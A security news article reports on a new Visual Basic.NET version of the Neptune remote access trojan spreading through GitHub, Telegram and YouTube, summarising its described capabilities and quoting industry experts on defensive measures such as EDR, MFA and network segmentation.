A new version of Neptune RAT written in Visual Basic.NET is spreading rapidly across many platforms, most notably GitHub, Telegram, and YouTube.CYFIRMA researchers said the creator of the remote access trojan (RAT) made the software available without the source code, intentionally obfuscating the executable files to make analysis more challenging.According to an April 7 post, Neptune RAT has many dangerous features, including a ransomware capability, a crypto clipper, a password grabber, live desktop monitoring, and the ability to disable antivirus software. It can also exfiltrate the credentials of more than 270 applications.Satish Swargam, principal security consultant at Black Duck, said some of Neptune RAT’s exploits include deploying ransomware that encrypts files and demands payment, bringing businesses to a halt until the issue has been addressed.Swargam said Neptune RAT exemplifies the notion that software risk equates to business risk. And it comes with widespread consequences, as victim’s screens can be monitored in real-time and the RAT can replace clipboard content with the attacker’s cryptocurrency wallet addresses.“This malware continues to evolve with new exploits since the techniques are available on GitHub initially meant to be for educational purposes by the Freemasonry Group,” said Swargam. “Continuous monitoring, robust endpoint protection, and proactive threat detection strategies are crucial to mitigating the impact of this trojan.”Darren Guccione, co-founder and CEO at Keeper Security, said the resurgence and rebranding of Neptune RAT highlights how accessible and damaging RATs have become in the wrong hands. Marketed as “educational,” Guccione said this malware is anything but harmless.“It can steal credentials from hundreds of applications, hijack crypto transactions, deploy ransomware and even destroy systems – often without detection,” said Guccione. “The fact that it’s spreading through mainstream platforms like GitHub, YouTube and Telegram is particularly concerning. This serves as a stark reminder for users to be vigilant, use strong and unique passwords stored in a secure password manager, enable MFA everywhere possible and avoid downloading unknown tools or scripts online.”Lawrence Pingree, vice president at Dispersive, explained that Neptune RAT uses living-off-the-land (LOTL) attacks tied to PowerShell. Pingree said security teams can use endpoint, detection and response (EDR) tools to detect the use of PowerShell commands, but they must be reviewed by a human in most cases.“Ideally, segmenting and microsegmenting an environment can help reduce the potential lateral movement of an attacker,” said Pingree.
